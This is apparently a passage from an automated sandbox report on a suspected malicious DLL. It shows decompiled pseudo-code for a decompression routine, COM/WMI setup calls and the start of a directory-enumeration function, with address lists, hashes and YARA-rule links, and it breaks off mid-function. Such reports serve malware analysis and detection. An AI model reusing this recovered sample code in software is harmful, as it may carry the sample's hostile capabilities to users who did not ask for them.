								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001533c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x1001533c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}




























































































                                                                                                                                                                                                0x100153bf
                                                                                                                                                                                                0x100153c4
                                                                                                                                                                                                0x100153c5
                                                                                                                                                                                                0x100153c8
                                                                                                                                                                                                0x100153c9
                                                                                                                                                                                                0x100153cd
                                                                                                                                                                                                0x100153d3
                                                                                                                                                                                                0x100153da
                                                                                                                                                                                                0x100153de
                                                                                                                                                                                                0x100153e6
                                                                                                                                                                                                0x100153e9
                                                                                                                                                                                                0x100153fa
                                                                                                                                                                                                0x100153fe
                                                                                                                                                                                                0x10015402
                                                                                                                                                                                                0x1001540c
                                                                                                                                                                                                0x10015410
                                                                                                                                                                                                0x1001541f
                                                                                                                                                                                                0x1001542d
                                                                                                                                                                                                0x10015431
                                                                                                                                                                                                0x10015437
                                                                                                                                                                                                0x1001543a
                                                                                                                                                                                                0x1001543e
                                                                                                                                                                                                0x10015442
                                                                                                                                                                                                0x10015446
                                                                                                                                                                                                0x10015449
                                                                                                                                                                                                0x1001544c
                                                                                                                                                                                                0x10015450
                                                                                                                                                                                                0x10015456
                                                                                                                                                                                                0x1001547a
                                                                                                                                                                                                0x10015480
                                                                                                                                                                                                0x10015486
                                                                                                                                                                                                0x10015487
                                                                                                                                                                                                0x10015489
                                                                                                                                                                                                0x1001548c
                                                                                                                                                                                                0x1001548e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001548e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015458
                                                                                                                                                                                                0x1001545b
                                                                                                                                                                                                0x1001546e
                                                                                                                                                                                                0x1001546e
                                                                                                                                                                                                0x1001546e
                                                                                                                                                                                                0x10015470
                                                                                                                                                                                                0x10015474
                                                                                                                                                                                                0x10015492
                                                                                                                                                                                                0x10015492
                                                                                                                                                                                                0x10015496
                                                                                                                                                                                                0x10015496
                                                                                                                                                                                                0x1001549d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100154a3
                                                                                                                                                                                                0x10015510
                                                                                                                                                                                                0x10015513
                                                                                                                                                                                                0x10015517
                                                                                                                                                                                                0x10015519
                                                                                                                                                                                                0x1001551b
                                                                                                                                                                                                0x10015520
                                                                                                                                                                                                0x10015520
                                                                                                                                                                                                0x1001552b
                                                                                                                                                                                                0x1001552e
                                                                                                                                                                                                0x10015530
                                                                                                                                                                                                0x10015532
                                                                                                                                                                                                0x10015536
                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                0x1001553b
                                                                                                                                                                                                0x10015553
                                                                                                                                                                                                0x10015556
                                                                                                                                                                                                0x1001555a
                                                                                                                                                                                                0x10015656
                                                                                                                                                                                                0x1001596a
                                                                                                                                                                                                0x1001596c
                                                                                                                                                                                                0x1001597a
                                                                                                                                                                                                0x1001597f
                                                                                                                                                                                                0x1001596e
                                                                                                                                                                                                0x1001596e
                                                                                                                                                                                                0x10015973
                                                                                                                                                                                                0x10015973
                                                                                                                                                                                                0x10015996
                                                                                                                                                                                                0x10015996
                                                                                                                                                                                                0x1001599c
                                                                                                                                                                                                0x1001599e
                                                                                                                                                                                                0x1001599e
                                                                                                                                                                                                0x100159a4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100159a4
                                                                                                                                                                                                0x1001566c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001566c
                                                                                                                                                                                                0x10015560
                                                                                                                                                                                                0x10015563
                                                                                                                                                                                                0x10015567
                                                                                                                                                                                                0x1001556d
                                                                                                                                                                                                0x1001556f
                                                                                                                                                                                                0x10015571
                                                                                                                                                                                                0x10015576
                                                                                                                                                                                                0x10015578
                                                                                                                                                                                                0x10015578
                                                                                                                                                                                                0x10015582
                                                                                                                                                                                                0x10015584
                                                                                                                                                                                                0x10015586
                                                                                                                                                                                                0x10015588
                                                                                                                                                                                                0x10015588
                                                                                                                                                                                                0x1001558a
                                                                                                                                                                                                0x10015591
                                                                                                                                                                                                0x10015595
                                                                                                                                                                                                0x10015597
                                                                                                                                                                                                0x10015599
                                                                                                                                                                                                0x1001559e
                                                                                                                                                                                                0x1001559e
                                                                                                                                                                                                0x100155aa
                                                                                                                                                                                                0x100155ad
                                                                                                                                                                                                0x100155af
                                                                                                                                                                                                0x100155b4
                                                                                                                                                                                                0x100155b6
                                                                                                                                                                                                0x100155b8
                                                                                                                                                                                                0x100155bc
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015676
                                                                                                                                                                                                0x1001595e
                                                                                                                                                                                                0x1001595e
                                                                                                                                                                                                0x10015963
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015963
                                                                                                                                                                                                0x1001568c
                                                                                                                                                                                                0x1001568c
                                                                                                                                                                                                0x100155c2
                                                                                                                                                                                                0x100155c5
                                                                                                                                                                                                0x1001562f
                                                                                                                                                                                                0x100155ee
                                                                                                                                                                                                0x100155ee
                                                                                                                                                                                                0x100155f4
                                                                                                                                                                                                0x100155fa
                                                                                                                                                                                                0x10015696
                                                                                                                                                                                                0x1001569a
                                                                                                                                                                                                0x1001569c
                                                                                                                                                                                                0x100156a2
                                                                                                                                                                                                0x10015986
                                                                                                                                                                                                0x10015986
                                                                                                                                                                                                0x1001598a
                                                                                                                                                                                                0x1001598f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001598f
                                                                                                                                                                                                0x100156a8
                                                                                                                                                                                                0x100156af
                                                                                                                                                                                                0x100156d5
                                                                                                                                                                                                0x100156db
                                                                                                                                                                                                0x1001570b
                                                                                                                                                                                                0x1001570d
                                                                                                                                                                                                0x10015713
                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                0x10015717
                                                                                                                                                                                                0x1001571b
                                                                                                                                                                                                0x1001571b
                                                                                                                                                                                                0x100156dd
                                                                                                                                                                                                0x100156e3
                                                                                                                                                                                                0x100156e5
                                                                                                                                                                                                0x100156e7
                                                                                                                                                                                                0x100156ed
                                                                                                                                                                                                0x100156f1
                                                                                                                                                                                                0x100156f1
                                                                                                                                                                                                0x100156f1
                                                                                                                                                                                                0x100156f3
                                                                                                                                                                                                0x100156f7
                                                                                                                                                                                                0x100156fd
                                                                                                                                                                                                0x10015701
                                                                                                                                                                                                0x10015701
                                                                                                                                                                                                0x10015701
                                                                                                                                                                                                0x10015705
                                                                                                                                                                                                0x10015705
                                                                                                                                                                                                0x100156fd
                                                                                                                                                                                                0x100156ed
                                                                                                                                                                                                0x100156b1
                                                                                                                                                                                                0x100156b3
                                                                                                                                                                                                0x100156b5
                                                                                                                                                                                                0x100156bb
                                                                                                                                                                                                0x100156bf
                                                                                                                                                                                                0x100156bf
                                                                                                                                                                                                0x100156bf
                                                                                                                                                                                                0x100156c3
                                                                                                                                                                                                0x100156c3
                                                                                                                                                                                                0x100156bb
                                                                                                                                                                                                0x1001571d
                                                                                                                                                                                                0x1001571f
                                                                                                                                                                                                0x1001571f
                                                                                                                                                                                                0x1001571f
                                                                                                                                                                                                0x10015721
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015721
                                                                                                                                                                                                0x10015606
                                                                                                                                                                                                0x10015608
                                                                                                                                                                                                0x1001560d
                                                                                                                                                                                                0x10015615
                                                                                                                                                                                                0x10015618
                                                                                                                                                                                                0x1001561b
                                                                                                                                                                                                0x10015621
                                                                                                                                                                                                0x10015621
                                                                                                                                                                                                0x10015621
                                                                                                                                                                                                0x10015623
                                                                                                                                                                                                0x10015637
                                                                                                                                                                                                0x10015637
                                                                                                                                                                                                0x1001563c
                                                                                                                                                                                                0x1001563e
                                                                                                                                                                                                0x10015641
                                                                                                                                                                                                0x10015644
                                                                                                                                                                                                0x10015647
                                                                                                                                                                                                0x1001564a
                                                                                                                                                                                                0x1001564d
                                                                                                                                                                                                0x1001564d
                                                                                                                                                                                                0x1001564d
                                                                                                                                                                                                0x1001564d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001562f
                                                                                                                                                                                                0x100155c9
                                                                                                                                                                                                0x100155cf
                                                                                                                                                                                                0x100155d1
                                                                                                                                                                                                0x100155d3
                                                                                                                                                                                                0x100155d8
                                                                                                                                                                                                0x100155da
                                                                                                                                                                                                0x100155da
                                                                                                                                                                                                0x100155e4
                                                                                                                                                                                                0x100155e6
                                                                                                                                                                                                0x100155e8
                                                                                                                                                                                                0x100155ea
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100155ea
                                                                                                                                                                                                0x1001553c
                                                                                                                                                                                                0x1001553c
                                                                                                                                                                                                0x100159a8
                                                                                                                                                                                                0x100159af
                                                                                                                                                                                                0x100159b1
                                                                                                                                                                                                0x100159b1
                                                                                                                                                                                                0x100159b3
                                                                                                                                                                                                0x100159b9
                                                                                                                                                                                                0x100159bc
                                                                                                                                                                                                0x100159bf
                                                                                                                                                                                                0x100159c4
                                                                                                                                                                                                0x100159c6
                                                                                                                                                                                                0x100159c9
                                                                                                                                                                                                0x100159cc
                                                                                                                                                                                                0x100159ce
                                                                                                                                                                                                0x100159d6
                                                                                                                                                                                                0x100159da
                                                                                                                                                                                                0x100159dc
                                                                                                                                                                                                0x100159e0
                                                                                                                                                                                                0x100159e8
                                                                                                                                                                                                0x100159e8
                                                                                                                                                                                                0x100159ec
                                                                                                                                                                                                0x100159f5
                                                                                                                                                                                                0x100159fd
                                                                                                                                                                                                0x100159ff
                                                                                                                                                                                                0x10015a02
                                                                                                                                                                                                0x10015a05
                                                                                                                                                                                                0x10015a05
                                                                                                                                                                                                0x10015a09
                                                                                                                                                                                                0x10015a0c
                                                                                                                                                                                                0x10015a12
                                                                                                                                                                                                0x10015a25
                                                                                                                                                                                                0x10015a14
                                                                                                                                                                                                0x10015a19
                                                                                                                                                                                                0x10015a19
                                                                                                                                                                                                0x10015a28
                                                                                                                                                                                                0x10015a2e
                                                                                                                                                                                                0x10015a47
                                                                                                                                                                                                0x10015a30
                                                                                                                                                                                                0x10015a38
                                                                                                                                                                                                0x10015a38
                                                                                                                                                                                                0x10015a4d
                                                                                                                                                                                                0x10015a52
                                                                                                                                                                                                0x10015a52
                                                                                                                                                                                                0x100154a5
                                                                                                                                                                                                0x100154a6
                                                                                                                                                                                                0x100154a7
                                                                                                                                                                                                0x100154a8
                                                                                                                                                                                                0x100154a9
                                                                                                                                                                                                0x100154ad
                                                                                                                                                                                                0x100154b4
                                                                                                                                                                                                0x100154b5
                                                                                                                                                                                                0x100154b6
                                                                                                                                                                                                0x100154b7
                                                                                                                                                                                                0x100154b9
                                                                                                                                                                                                0x100154ff
                                                                                                                                                                                                0x100154ff
                                                                                                                                                                                                0x10015509
                                                                                                                                                                                                0x10015509
                                                                                                                                                                                                0x1001550a
                                                                                                                                                                                                0x1001550b
                                                                                                                                                                                                0x1001550c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001550c
                                                                                                                                                                                                0x100154bd
                                                                                                                                                                                                0x100154c5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100154d7
                                                                                                                                                                                                0x100154dc
                                                                                                                                                                                                0x100154e7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100154f3
                                                                                                                                                                                                0x100154f3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100154f3
                                                                                                                                                                                                0x100154e7
                                                                                                                                                                                                0x100154c5
                                                                                                                                                                                                0x1001572c
                                                                                                                                                                                                0x1001572e
                                                                                                                                                                                                0x10015731
                                                                                                                                                                                                0x10015733
                                                                                                                                                                                                0x10015737
                                                                                                                                                                                                0x1001573a
                                                                                                                                                                                                0x1001573f
                                                                                                                                                                                                0x10015742
                                                                                                                                                                                                0x10015745
                                                                                                                                                                                                0x1001574c
                                                                                                                                                                                                0x1001574c
                                                                                                                                                                                                0x10015752
                                                                                                                                                                                                0x10015754
                                                                                                                                                                                                0x10015757
                                                                                                                                                                                                0x1001575a
                                                                                                                                                                                                0x1001575d
                                                                                                                                                                                                0x10015760
                                                                                                                                                                                                0x10015763
                                                                                                                                                                                                0x10015763
                                                                                                                                                                                                0x10015766
                                                                                                                                                                                                0x10015769
                                                                                                                                                                                                0x1001576c
                                                                                                                                                                                                0x1001576f
                                                                                                                                                                                                0x10015772
                                                                                                                                                                                                0x10015772
                                                                                                                                                                                                0x10015775
                                                                                                                                                                                                0x10015778
                                                                                                                                                                                                0x1001577c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015799
                                                                                                                                                                                                0x1001579e
                                                                                                                                                                                                0x10015886
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001588f
                                                                                                                                                                                                0x10015892
                                                                                                                                                                                                0x1001589e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001589e
                                                                                                                                                                                                0x100157a4
                                                                                                                                                                                                0x100157a7
                                                                                                                                                                                                0x100157a9
                                                                                                                                                                                                0x100157ac
                                                                                                                                                                                                0x100157af
                                                                                                                                                                                                0x100157b2
                                                                                                                                                                                                0x100157bb
                                                                                                                                                                                                0x100157bb
                                                                                                                                                                                                0x100157bd
                                                                                                                                                                                                0x100157c3
                                                                                                                                                                                                0x100157c5
                                                                                                                                                                                                0x100157c8
                                                                                                                                                                                                0x100157cb
                                                                                                                                                                                                0x100157ce
                                                                                                                                                                                                0x100157d1
                                                                                                                                                                                                0x100157d4
                                                                                                                                                                                                0x100157d4
                                                                                                                                                                                                0x100157db
                                                                                                                                                                                                0x100157de
                                                                                                                                                                                                0x100157e1
                                                                                                                                                                                                0x100157e4
                                                                                                                                                                                                0x100157e7
                                                                                                                                                                                                0x100157e7
                                                                                                                                                                                                0x100157ec
                                                                                                                                                                                                0x100157ef
                                                                                                                                                                                                0x100157f1
                                                                                                                                                                                                0x100157f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100158aa
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100158b3
                                                                                                                                                                                                0x100158b6
                                                                                                                                                                                                0x100158c6
                                                                                                                                                                                                0x100158c6
                                                                                                                                                                                                0x100157fc
                                                                                                                                                                                                0x100157ff
                                                                                                                                                                                                0x1001585b
                                                                                                                                                                                                0x10015815
                                                                                                                                                                                                0x10015815
                                                                                                                                                                                                0x1001581b
                                                                                                                                                                                                0x10015821
                                                                                                                                                                                                0x100158d2
                                                                                                                                                                                                0x100158d6
                                                                                                                                                                                                0x100158d8
                                                                                                                                                                                                0x100158de
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100158e4
                                                                                                                                                                                                0x100158eb
                                                                                                                                                                                                0x1001590d
                                                                                                                                                                                                0x10015913
                                                                                                                                                                                                0x1001593f
                                                                                                                                                                                                0x10015943
                                                                                                                                                                                                0x10015945
                                                                                                                                                                                                0x10015947
                                                                                                                                                                                                0x10015947
                                                                                                                                                                                                0x10015947
                                                                                                                                                                                                0x1001594b
                                                                                                                                                                                                0x1001594b
                                                                                                                                                                                                0x10015915
                                                                                                                                                                                                0x1001591b
                                                                                                                                                                                                0x1001591d
                                                                                                                                                                                                0x10015921
                                                                                                                                                                                                0x10015923
                                                                                                                                                                                                0x10015925
                                                                                                                                                                                                0x10015925
                                                                                                                                                                                                0x10015925
                                                                                                                                                                                                0x10015927
                                                                                                                                                                                                0x1001592b
                                                                                                                                                                                                0x10015931
                                                                                                                                                                                                0x10015933
                                                                                                                                                                                                0x10015935
                                                                                                                                                                                                0x10015935
                                                                                                                                                                                                0x10015935
                                                                                                                                                                                                0x10015939
                                                                                                                                                                                                0x10015939
                                                                                                                                                                                                0x10015931
                                                                                                                                                                                                0x10015921
                                                                                                                                                                                                0x100158ed
                                                                                                                                                                                                0x100158ef
                                                                                                                                                                                                0x100158f3
                                                                                                                                                                                                0x100158f5
                                                                                                                                                                                                0x100158f7
                                                                                                                                                                                                0x100158f7
                                                                                                                                                                                                0x100158f7
                                                                                                                                                                                                0x100158fb
                                                                                                                                                                                                0x100158fb
                                                                                                                                                                                                0x100158f3
                                                                                                                                                                                                0x1001594d
                                                                                                                                                                                                0x1001594f
                                                                                                                                                                                                0x1001594f
                                                                                                                                                                                                0x1001594f
                                                                                                                                                                                                0x10015951
                                                                                                                                                                                                0x10015955
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015955
                                                                                                                                                                                                0x1001582b
                                                                                                                                                                                                0x1001582d
                                                                                                                                                                                                0x10015832
                                                                                                                                                                                                0x1001583a
                                                                                                                                                                                                0x1001583d
                                                                                                                                                                                                0x10015840
                                                                                                                                                                                                0x10015846
                                                                                                                                                                                                0x10015846
                                                                                                                                                                                                0x10015846
                                                                                                                                                                                                0x10015848
                                                                                                                                                                                                0x1001584c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015863
                                                                                                                                                                                                0x10015863
                                                                                                                                                                                                0x10015866
                                                                                                                                                                                                0x10015868
                                                                                                                                                                                                0x1001586b
                                                                                                                                                                                                0x1001586e
                                                                                                                                                                                                0x10015871
                                                                                                                                                                                                0x10015874
                                                                                                                                                                                                0x10015877
                                                                                                                                                                                                0x10015877
                                                                                                                                                                                                0x10015877
                                                                                                                                                                                                0x10015879
                                                                                                                                                                                                0x10015782
                                                                                                                                                                                                0x10015786
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015786
                                                                                                                                                                                                0x1001585b
                                                                                                                                                                                                0x10015801
                                                                                                                                                                                                0x10015804
                                                                                                                                                                                                0x10015807
                                                                                                                                                                                                0x1001580a
                                                                                                                                                                                                0x10015813
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015813
                                                                                                                                                                                                0x1001577e
                                                                                                                                                                                                0x10015781
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001578c
                                                                                                                                                                                                0x1001578c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10015792

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                                                                • API String ID: 0-3089872807
                                                                                                                                                                                                • Opcode ID: 2c9f3f73b7300a5551f5e63896b23f8b0b715e92add786df6d269eb33b5170bd
                                                                                                                                                                                                • Instruction ID: fac0eb44e7ef1ba0e8fa27e73f891139cf5bdba97e6d8b24c0e442f6646d81f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c9f3f73b7300a5551f5e63896b23f8b0b715e92add786df6d269eb33b5170bd
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5122831A08752CFD715DE38C59020ABBE2FB88296F59862DE885DFB41D372DD85CB81
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000D565, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 30%
                                                                                                                                                                                                			E1000D565(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E100085E5(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                                                                                                                0x1000d572
                                                                                                                                                                                                0x1000d575
                                                                                                                                                                                                0x1000d578
                                                                                                                                                                                                0x1000d589
                                                                                                                                                                                                0x1000d58f
                                                                                                                                                                                                0x1000d5a0
                                                                                                                                                                                                0x1000d5a8
                                                                                                                                                                                                0x1000d5f9
                                                                                                                                                                                                0x1000d5f9
                                                                                                                                                                                                0x1000d5fe
                                                                                                                                                                                                0x1000d603
                                                                                                                                                                                                0x1000d603
                                                                                                                                                                                                0x1000d606
                                                                                                                                                                                                0x1000d60b
                                                                                                                                                                                                0x1000d610
                                                                                                                                                                                                0x1000d610
                                                                                                                                                                                                0x1000d613
                                                                                                                                                                                                0x1000d5aa
                                                                                                                                                                                                0x1000d5ab
                                                                                                                                                                                                0x1000d5b1
                                                                                                                                                                                                0x1000d5c2
                                                                                                                                                                                                0x1000d5c7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000d5c9
                                                                                                                                                                                                0x1000d5d6
                                                                                                                                                                                                0x1000d5de
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000d5e0
                                                                                                                                                                                                0x1000d5e2
                                                                                                                                                                                                0x1000d5ea
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000d5ec
                                                                                                                                                                                                0x1000d5ef
                                                                                                                                                                                                0x1000d5f5
                                                                                                                                                                                                0x1000d5f5
                                                                                                                                                                                                0x1000d5ea
                                                                                                                                                                                                0x1000d5de
                                                                                                                                                                                                0x1000d5c7
                                                                                                                                                                                                0x1000d618

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D578
                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D589
                                                                                                                                                                                                • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5A0
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D5AB
                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5D6
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2855449287-0
                                                                                                                                                                                                • Opcode ID: 363b7d0d28ed638fb71b6d1acd48cad8d07449bc4d488f072401678fb70f4c70
                                                                                                                                                                                                • Instruction ID: f881ef7bfe12a94a207f903728f076071e760daf75670509cf70e82b123430e5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 363b7d0d28ed638fb71b6d1acd48cad8d07449bc4d488f072401678fb70f4c70
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE212834600255BBE7249BA6CC4CE5FBFBCEFC2B55B10415DB901AA290DB719A00CA30
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000AEF6, Relevance: 3.1, APIs: 2, Instructions: 113fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			E1000AEF6(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092C6(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E100085FB( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
